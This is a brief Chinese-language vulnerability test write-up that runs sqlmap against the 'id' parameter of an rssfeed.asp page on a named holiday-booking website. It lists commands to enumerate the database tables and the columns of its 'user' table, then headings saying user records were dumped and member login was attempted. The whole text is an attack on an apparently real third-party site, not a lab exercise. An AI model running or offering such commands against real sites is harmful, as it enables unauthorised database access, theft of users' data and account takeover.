漏洞测试:Sqlmap –u “http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196”
猜解出表格
Sqlmap –u “http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196” –tables
对user的列名进行猜解
Sqlmap –u “http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196” –T user –columns
通过工具跑出部分user的部分数据:
更多数据:
尝试登陆会员: